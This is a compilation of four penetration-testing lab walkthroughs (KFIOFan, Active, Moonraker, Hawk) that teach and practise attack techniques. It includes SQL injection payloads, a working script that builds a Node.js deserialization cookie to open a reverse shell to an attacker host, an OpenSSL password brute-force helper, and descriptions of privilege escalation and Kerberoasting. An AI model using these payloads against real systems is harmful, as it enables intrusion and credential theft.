KFIOFan:1 Vulnhub Walkthrough

Hello friends!! Today we are going to take on another boot2root challenge, KFIOFan. The lab is built in French and uses a pair of geographical coordinates in France as its entry point. There are four flags to find using web penetration testing skills, since the machine is vulnerable to SQL injection.

Official Description: Two French people want to start the very first fan club of the YouTuber Khaos Farbauti Ibn Oblivion. But they're not very security aware! (IMPORTANT NOTE: The whole challenge is in French, including server conf. Which may add to the difficulty if you are non-native or using a non-AZERTY keyboard)

You can download this VM here.

Penetration Methodology

Network Scanning

  • Open ports and running services (Nmap)

Enumeration

  • Abusing the HTTP service to obtain credentials
  • Use robots.txt for the first flag

Exploit

  • Exploiting SQL injection
  • Obtain the SSH RSA key
  • SSH login
  • Catch another flag

Privilege Escalation

  • Check sudo rights
  • Spawn a root shell
  • Capture the last flag

Walkthrough

Network Scanning

Let's start off by scanning the network to find our target.

Nmap found two open ports (22 and 80) on the target, so let's navigate to port 80 in the browser.

Enumeration

Exploring port 80, we notice that it requires HTTP authentication, for which we have no credentials. There is, however, a text message (This site says: "48.416667 -0.916667") that looks like a pair of geographical coordinates.

When we cancelled the authentication prompt, we saw a message in French saying "Let me guess Bob, did you lose your password again? LOL". We took Bob to be a valid username.

Searching 48.416667 -0.916667 in Google Maps gives the location "Levaré", a likely password for user Bob.

Hmmmm!! Our guess was right and we passed the HTTP authentication with Bob:Levaré.

Note: This is not quite as easy as it looks, because the coordinates change every time the machine reboots, and the password changes with them.

Luckily, exploring /robots.txt turned up the first flag, again in French; translated:

FLAG1: Congratulations you found the first flag! (Yes I know you’re hoping for a clue but at least you have the right reflexes!)


As the official description says, "Two French people want to start the very first fan club of the YouTuber", and the web page gives us the names of those two people, Alice and Bob, which we take as usernames.

Exploit

Translating the whole text of this page again, we conclude that user "Alice" holds something crucial, such as an important file or an SSH key.

A link to Khaosearch brings us to a search form for the CTF author's YouTube channel. Without wasting time we test it for SQL injection by submitting the following query:

Lol! It was vulnerable to SQL injection; let's exploit it quickly.

With the following query we pull all the table and column names out of the database.

I stopped when I saw an entry for ssh_key and decided to check it, since it looked the most promising.

Injecting the following query to read ssh_key returned another link, for Alice.

Alice's record holds a private SSH key, which has to be copied out intact, so I opened the source code of this page.

Copy the RSA key from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY-----, paste it into a text file named id_rsa and set its permissions to 600; ssh refuses a private key that is readable by others.
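The injection steps above, as an added example that is not part of the original walkthrough: a miniature of the Khaosearch form against an in-memory SQLite database. The table and column names (videos, membres, nom, ssh_key) and the key material are stand-ins for the demo, not the machine's real schema. It walks the same path as the text: confirm the injection with a lone quote, enumerate tables and columns through the schema catalogue (sqlite_master here; information_schema.tables and information_schema.columns on MySQL), then read the ssh_key column with a UNION, and ends with the parameterised version of the same query that defeats all three payloads.

```python
import sqlite3

# Constructed stand-in for the fan club database. Table/column names (videos,
# membres, nom, ssh_key) are assumptions for this demo, not the real schema.
DEMO_KEY = ("-----BEGIN RSA PRIVATE KEY-----\n"
            "MIIEdemoKEYdemoKEYdemoKEYdemoKEY\n"
            "-----END RSA PRIVATE KEY-----")


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE videos (title TEXT, url TEXT);
        INSERT INTO videos VALUES ('Khaos episode 1', 'https://youtube.example/v/1');
        INSERT INTO videos VALUES ('Khaos episode 2', 'https://youtube.example/v/2');
        CREATE TABLE membres (nom TEXT, ssh_key TEXT);
        INSERT INTO membres VALUES ('bob', NULL);
    """)
    con.execute("INSERT INTO membres VALUES ('alice', ?)", (DEMO_KEY,))
    return con


def vulnerable_search(con, term):
    """The search form as the text describes it: user input glued into the SQL string."""
    query = f"SELECT title, url FROM videos WHERE title LIKE '%{term}%'"
    return con.execute(query).fetchall()


def safe_search(con, term):
    """Same search with a bound parameter: the input can only ever be a LIKE pattern."""
    return con.execute("SELECT title, url FROM videos WHERE title LIKE ?",
                       (f"%{term}%",)).fetchall()


def is_injectable(con):
    """Step 1: a lone quote breaks the query, the classic first sign of injection."""
    try:
        vulnerable_search(con, "'")
    except sqlite3.OperationalError:
        return True
    return False


# Step 2: enumerate tables and columns. The UNION must return the same number of
# columns as the original SELECT (two here). sqlite_master plays the role that
# information_schema.tables / information_schema.columns play on MySQL; its sql
# column holds the CREATE statement, which lists every column name.
SCHEMA_PAYLOAD = "' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--"


def enumerate_schema(con):
    rows = vulnerable_search(con, SCHEMA_PAYLOAD)
    return {name: sql for name, sql in rows
            if sql and sql.upper().startswith("CREATE TABLE")}


# Step 3: read the interesting column found in step 2 (bob's NULL key is dropped).
DUMP_PAYLOAD = "' UNION SELECT nom, ssh_key FROM membres--"


def dump_ssh_keys(con):
    rows = vulnerable_search(con, DUMP_PAYLOAD)
    return {nom: key for nom, key in rows if key and key.startswith("-----BEGIN")}
```

The trailing `--` comments out the `%'` the application appends after our input; on MySQL the comment marker needs a trailing space (`-- `) or use `#`. If the column count is unknown, find it first with `ORDER BY n` or `UNION SELECT NULL,NULL,...` until the error disappears.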

Privilege Escalation


Now connect over SSH using the key above and run the following command:

We connected over SSH successfully and found the 3rd flag as well.

FLAG 3: Congratulations for coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!

To find the 4th flag we need root privileges, so let's check alice's sudo rights with the following command:

Hmmm!! alice can run awk as root without a password. awk can execute system commands, so this permission gives us a root shell straight away.

FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!

Note: The coordinates change on every reboot of this VM, which also changes the password and the SSH key, so you will get a new password and a new SSH key each time.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

Hack the Box: Active Walkthrough

Today we are going to solve another CTF challenge, "Active". Active is a retired vulnerable lab presented by Hack The Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

  • Open ports and running services (Nmap)

Enumeration

  • Identify shares (enum4linux)
  • Access the share via anonymous login (smbclient)
  • Decrypt the cpassword (gpprefdecrypt.py)

Access Victim’s Shell via SMB connect

  • Access the share with the user login
  • Get user.txt

Privilege Escalation

  • Find Service Principal Names (GetUserSPNs.py)
  • Crack the hash (hashcat)
  • psexec exploit (Metasploit)
  • Get root.txt

Walkthrough

Scanning Network

Note: Since these labs are available online, they have static IPs. The IP of Active is 10.10.10.100

Let's start off with our basic nmap command to find the open ports and services.

As you can see from the Nmap scan, many ports are open along with their services, the OS is Microsoft Windows Server 2008 R2 SP1, and you can also read the domain name "active.htb".

Enumeration

I tried the EternalBlue attack when I saw port 445 open, but this SMB build is patched, so I started with the enum4linux script instead. As we all know, it is the best script for SMB enumeration.

It shows that anonymous login is allowed on the Replication share.

Then I accessed Replication with smbclient, running the following command to browse the share via the anonymous account:

Here I downloaded the Groups.xml file, which I found under the following path:

Groups.xml carries a cpassword attribute for the user SVC_TGS.

So I downloaded the Python script gpprefdecrypt from GitHub to decrypt it. Passwords of local users set through Windows 2008 Group Policy Preferences (GPP) are AES-encrypted with a static key that Microsoft published in its own documentation (the reason behind MS14-025), so anyone who can read the file can recover the plaintext, here GPPstillStandingStrong2k18.

Access Victim’s Shell via SMB connect

Using these credentials we connect to SMB with the following command and grab our 1st flag, the user.txt file.

Now it is time to hunt root.txt, which as always means escalating privileges. First let's add the host IP and hostname to /etc/hosts on our local machine, so that the Kerberos tooling in the next step can resolve the domain.

Privilege Escalation

The Nmap scan showed port 88 (Kerberos) open, so there may be Service Principal Names (SPNs) associated with normal user accounts; any domain user can request a service ticket for such an SPN and crack it offline (Kerberoasting). We therefore downloaded and installed impacket from GitHub to use its GetUserSPNs.py script.

I copied the hash into a text file, hash.txt, for cracking.

Then with hashcat's help we identified the hash mode: 13100, Kerberos 5 TGS-REP etype 23.

Finally it was time to crack the hash and obtain the password with the rockyou.txt wordlist.

Hurray!!! We got it: Ticketmaster1968 for administrator.

Without wasting time I loaded the Metasploit framework and ran the following module (psexec) to spawn a fully privileged SYSTEM shell.

BOOOMMM…………………

Now that we have a fully privileged shell, let's head for root.txt and finish this challenge.

Yuppieee! We found our 2nd flag, root.txt, in /Users/Administrator/Desktop.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

Moonraker:1 Vulnhub Walkthrough

Hack into the Moonraker system and discover who is behind these menacing plans once and for all. Find and destroy the Villain before it is too late. You have received intelligence of a new Villain investing heavily in Space and Laser Technologies. Although the Villain is unknown, we know the motives are ominous and apocalyptic. The challenge is to get root on the targeted virtual machine and read the flag.txt within that directory.

Download it from here: https://www.vulnhub.com/entry/moonraker-1,264/

Penetrating Methodology:

  • Network scanning (Netdiscover & Nmap)
  • Web directory enumeration (Dirb)
  • Tailing the apache2 access log
  • Browsing the discovered directories
  • Finding login credentials for CouchDB
  • Reaching the Fauxton login page
  • Checking various directories in the browser
  • Finding login credentials
  • Logging into the Node.js Express application
  • Capturing the cookie with Burp Suite
  • Using a Node.js deserialization exploit for RCE
  • Converting decimal values to ASCII text
  • Using a script to convert ASCII text back to decimal values
  • Base64 encoding with echo
  • Getting a reverse shell on a netcat listener
  • Cracking the hash with John the Ripper
  • Getting root access
  • Reading the flag

Let’s Begin with the Walkthrough!!

Let's start off by scanning the network to find our target's IP.

We found our target IP –> 192.168.1.110

Next we scan the target IP with nmap.

The Nmap output shows several open ports: 22 (ssh), 80 (http), 110 (pop3), 3000 (http), 4369 (epmd), 5984 (couchdb).

Since port 80 is open we browse to it, but the page was not much help in moving ahead.

Next we enumerate accessible directories on the target with the following command.

After recursive enumeration we found a useful directory, /services, as highlighted.

Browsing to /services, we saw a SEND AN INQUIRY hyperlink at the bottom of the page. Let's find out where it leads by clicking on it.

It opened a SERVICES INFORMATION REQUEST FORM, as shown in the image. We noticed that someone will review our web-based inquiry and contact us within 5 minutes, which means a person or bot will open our submission in a browser, and any request that browser makes can be logged. But where?

We filled in the inquiry form with HTML containing an image tag whose source points at our own machine, as shown in the image.

Before clicking Submit to Sales Rep! we restarted our own apache2 service, so that if the reviewer's browser loads our image, the request appears in our apache2 access.log. After clicking Submit, it displayed a "thanks for your inquiry" message, as shown in the image.

We tailed the apache2 access log with the following command.

The logged request exposed a new web page: the browser that fetched our image sent the page it was viewing as the Referer, as highlighted in the image.

Let's find out where the new web page leads by opening it in the browser.

It leads to a Sales Admin Interface. This looks interesting and might hold some good clues.

Next we opened CouchDB Notes and got hints about login credentials: Username: jaws, Password: jaws' girlfriend's name + x99. A Google search gives the name of Jaws's girlfriend as Dolly, so the password is dollyx99.

We need these credentials to log into Fauxton, the web interface bundled with Apache CouchDB. Reading up on Fauxton and CouchDB told us how to reach the login page: it is served under /_utils/ on the CouchDB port.

Since port 5984 is open, we could open the CouchDB login page and log in with the credentials found above:

Booyeah!! We logged in. Now let's check the documents inside the 3 databases.

The link database proved useful. Every document in it contains a directory link, but the highlighted one looked like the clue for our next step.

The link in the highlighted document is shown in the image. Let's copy it and open it in the browser.

It opened an OFFER LETTER ARCHIVE BACKUP page. This is interesting; let's see what is hiding in these offer letters.

Woah!! Every offer letter contains a username and password. The pair we used is shown in the image.

From the Nmap output we knew port 3000 runs a Node.js application, so we browsed to the target IP on port 3000 and found a login portal. The credentials used to log in are:

After logging in we are shown the message in the image. The page seems useless at first, but after some time spent figuring out the next step it became very interesting.

Time to launch Burp Suite and intercept the request for this page. The request carries a base64-encoded value in Cookie: profile, as you can see in the image. That value is where we insert a Node.js deserialization exploit, base64 encoded. Let's begin.

As the image shows, we copy a Node.js deserialization exploit for remote code execution from:

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

The exploit's payload is given as a list of decimal character codes, so we convert it to ASCII text with an online converter and copy the result.

With nano we created a file, pasted the ASCII text, set host to our Kali Linux IP and the port to 1337, and saved it.

We then wrote a script, exploit.py, that converts the ASCII text back into decimal values with a comma between each, and used echo piped into base64 to encode the resulting payload. Copy the whole base64 string.

Set the copied base64 string as Cookie: profile in the intercepted request in Burp Suite, and start a netcat listener on port 1337 before forwarding the request.

We got a reverse shell on our netcat listener. To get a proper terminal we used the python pty one-liner.
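The cookie-building steps above, as an added example that is not taken from the walkthrough or from the opsecx post: it does in one script what the online converter, exploit.py and the echo|base64 step do by hand. The JavaScript is a net.Socket reverse shell of the same shape as the opsecx payload, the character codes are computed from it directly, and the result is wrapped in node-serialize's _$$ND_FUNC$$_ marker with a trailing () so unserialize() executes it as an IIFE. The attacker address 192.168.1.100 and the key name rce are assumptions; the port 1337 is the one the text uses.

```python
import base64
import json


def reverse_shell_js(host, port):
    """Node.js reverse shell of the same shape as the opsecx payload: spawn /bin/sh
    and pipe its stdio over a TCP connection back to host:port (attacker-controlled)."""
    return (
        "var net = require('net'), cp = require('child_process'), "
        "sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); "
        f"client.connect({int(port)}, '{host}', function() {{"
        "client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });"
    )


def to_char_codes(text):
    """exploit.py's job: each character as a decimal code, comma separated, so the
    JavaScript needs no quoting or escaping inside the JSON string."""
    return ",".join(str(ord(c)) for c in text)


def from_char_codes(codes):
    """Inverse, the 'decimal to ASCII' step done on an online converter in the text."""
    return "".join(chr(int(n)) for n in codes.split(","))


def build_profile_cookie(host, port, key="rce"):
    """Serialized object in node-serialize's format. A string value prefixed with
    _$$ND_FUNC$$_ is turned back into a function by unserialize(); the trailing ()
    makes it an IIFE, so the shell is spawned the moment the cookie is parsed.
    The key name is irrelevant to the library; 'rce' is an assumption."""
    func = ("_$$ND_FUNC$$_function (){eval(String.fromCharCode("
            + to_char_codes(reverse_shell_js(host, port)) + "))}()")
    return base64.b64encode(json.dumps({key: func}).encode()).decode()


def decode_profile_cookie(cookie, key="rce"):
    """What the server-side unserialize() receives, with the JavaScript recovered;
    useful for checking the cookie before pasting it into Burp."""
    func = json.loads(base64.b64decode(cookie))[key]
    if not (func.startswith("_$$ND_FUNC$$_") and func.endswith("}()")):
        raise ValueError("not an IIFE payload")
    start = func.index("fromCharCode(") + len("fromCharCode(")
    return from_char_codes(func[start:func.index("))", start)])


if __name__ == "__main__":
    cookie = build_profile_cookie("192.168.1.100", 1337)
    print("Cookie: profile=" + cookie)
    print(decode_profile_cookie(cookie))
```

Start the listener (`nc -lvnp 1337`) before the cookie is sent: the socket is opened during deserialization, so a missed connection means repeating the request. The original vulnerable pattern is the application calling unserialize() on a cookie it never signed; any HMAC over the cookie value would have stopped this.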

After enumerating further we found four mailboxes in /var/mail, but we lacked the permissions to read them. Looking into CouchDB's configuration, we learned that its default installation directory is /opt/couchdb and that it reads its configuration from etc/local.ini under that directory.

Let's tail the contents of local.ini.

The command revealed another set of login credentials, as shown in the image.

Then with the following command we switched user to hugo.

Reading hugo's mail, Message 2 is the interesting one: it contains root's password as a hash and tells us to ADD 'VR00M' after root's password. Time to crack it; we copied the hash into a file named hash.

John the Ripper cracked the root hash, i.e.

Let's switch user again and log in as root.

Booyeah!! We logged in as root, and in its mail directory we found the flag.txt file. Reading it, we are greeted with a congratulatory message.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge, "Hawk". Hawk is a retired vulnerable lab presented by Hack The Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt

Note: Since these labs are available online, they have static IPs. The IP of Hawk is 10.10.10.102

Penetration Methodology:

  • Port scanning and IP discovery
  • Anonymous FTP login
  • Checking the file type
  • Getting login credentials
  • Browsing the IP on port 80
  • Exploiting Drupal
  • Reading the first flag, user.txt
  • Getting login credentials
  • Spawning a TTY shell
  • Searching for an exploit with searchsploit
  • Getting root access
  • Reading the final flag, root.txt

Walkthrough

Let's start off with our basic nmap command to find the open ports and running services.

The Nmap output shows several open ports: 21 (ftp), 22 (ssh), 80 (http, Drupal CMS), 8082 (H2 database web console).

From the Nmap output we saw that FTP on port 21 is open, and the next thing that catches the eye is that anonymous login is allowed.

We connected to FTP through the anonymous login. After moving through several directories we found a hidden file, .drupal.txt.enc, and transferred it to our local machine.

Since .drupal.txt.enc is encrypted, let's check its type with the file command.

It is openssl enc'd data with a salted password. Clearly we need to decrypt it to get any further clue.

To crack it we used an openssl brute-force tool that is easily available on GitHub. You can download it from the link below or run the following command to fetch and execute the script.
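What `file` recognised and what the brute-force tool does per guess, as an added example (mine, not the tool from GitHub): an `openssl enc -salt` file starts with the 8-byte magic Salted__ followed by an 8-byte salt, and with the legacy defaults the key and IV are derived with EVP_BytesToKey, a single MD5 per candidate password (OpenSSL 1.1.0 changed the default digest to SHA-256 and 1.1.1 added -pbkdf2, so a cracker should try both digests). The block parses the header, derives key and IV for each candidate, and checks PKCS#7 padding on a decrypted block; the AES-256-CBC decryption itself needs a crypto library or the openssl binary with -K and -iv, which the standard library does not provide, so it is left to the caller. The sample file bytes are constructed.

```python
import hashlib

# What `file` keys on to report "openssl enc'd data with salted password".
MAGIC = b"Salted__"

# Constructed sample: magic, an 8-byte salt, then two blocks of dummy ciphertext.
SAMPLE_FILE = MAGIC + bytes.fromhex("0102030405060708") + b"\x00" * 32


def parse_openssl_enc(blob):
    """Split an `openssl enc -salt` file into (salt, ciphertext); None if no header."""
    if len(blob) < len(MAGIC) + 8 or not blob.startswith(MAGIC):
        return None
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, digest="md5", count=1):
    """OpenSSL's legacy KDF (EVP_BytesToKey).
    D1 = H(password || salt), Di = H(D(i-1) || password || salt), concatenated until
    key_len + iv_len bytes exist. `openssl enc` without -pbkdf2 uses count=1 with md5
    (before 1.1.0) or sha256 (1.1.0 and later); aes-256-cbc needs a 32-byte key and a
    16-byte IV. One hash per guess is why a wordlist attack on such files is cheap."""
    out, d = b"", b""
    while len(out) < key_len + iv_len:
        d = hashlib.new(digest, d + password + salt).digest()
        for _ in range(count - 1):
            d = hashlib.new(digest, d).digest()
        out += d
    return out[:key_len], out[key_len:key_len + iv_len]


def candidate_keys(blob, wordlist, digests=("md5", "sha256")):
    """Yield (password, digest, key, iv) for every guess: the loop a brute forcer runs.
    Decrypt the ciphertext with each (key, iv) using AES-256-CBC, e.g.
    `openssl enc -d -aes-256-cbc -K <key hex> -iv <iv hex>`, and accept the guess only
    if pkcs7_unpad() succeeds and the result looks like plaintext (a wrong key still
    yields valid-looking padding about 1 time in 256)."""
    parsed = parse_openssl_enc(blob)
    if parsed is None:
        return
    salt, _ciphertext = parsed
    for password in wordlist:
        for digest in digests:
            key, iv = evp_bytes_to_key(password.encode(), salt, digest=digest)
            yield password, digest, key, iv


def pkcs7_unpad(plaintext, block_size=16):
    """Return the unpadded plaintext, or None if the padding is invalid (wrong key)."""
    if not plaintext or len(plaintext) % block_size:
        return None
    n = plaintext[-1]
    if n < 1 or n > block_size or plaintext[-n:] != bytes([n]) * n:
        return None
    return plaintext[:-n]
```

Files produced with `-pbkdf2` (or `-iter`) are not covered by this KDF and cost thousands of hash iterations per guess, which is the defender's lesson here: the `.enc` file fell because it was protected by a dictionary word and a one-round MD5 derivation, not because of any flaw in AES.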

Boom!! We cracked the file, and the hint we got is "PencilKeyboardScanner123", which could be the password for the CMS login. Let's check.

Port 80 runs a web server, so we opened the target's IP in the browser and found a Drupal login page. We logged in with the username admin and the password PencilKeyboardScanner123.

Oh yeah!! We are in the admin dashboard. Now go to Modules and enable the check boxes for Path and PHP filter; the latter lets page content contain PHP that the server executes.

After that go to Content > Add Content > Basic Page to create a page in which we can place code that spawns a web shell. Give it any title.

Here we wrote a PHP reverse shell one-liner with the help of the Pentest Monkey website.

Then select the text format "PHP code". Start a netcat listener before saving, so that the reverse connection is caught as soon as the code executes.


We got a reverse connection from the victim on our netcat listener, and upgraded it to a proper shell with the python3 pty one-liner.

In /home/daniel we found the user.txt flag; now it is time for the root flag. While exploring the directories we read the Drupal settings.php file, which stores the database credentials, and found the password drupal4hawk.


Then with the following command we switched user to daniel, reusing that password.

daniel's login shell is a python3 interpreter, so we used simple python3 commands to escape it into a normal shell.

The Nmap output noted an H2 database on port 8082, so we searched searchsploit for H2 database exploits.

It turned up a remote code execution exploit, 45506.py (highlighted). We copied it to the /root directory and started a Python web server so the target could download it.

We downloaded 45506.py into /tmp on the target, made it executable and ran it with the following command.

Finally!! We have root access. Now let's go and get root.txt. Reading the file, we find our final flag.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here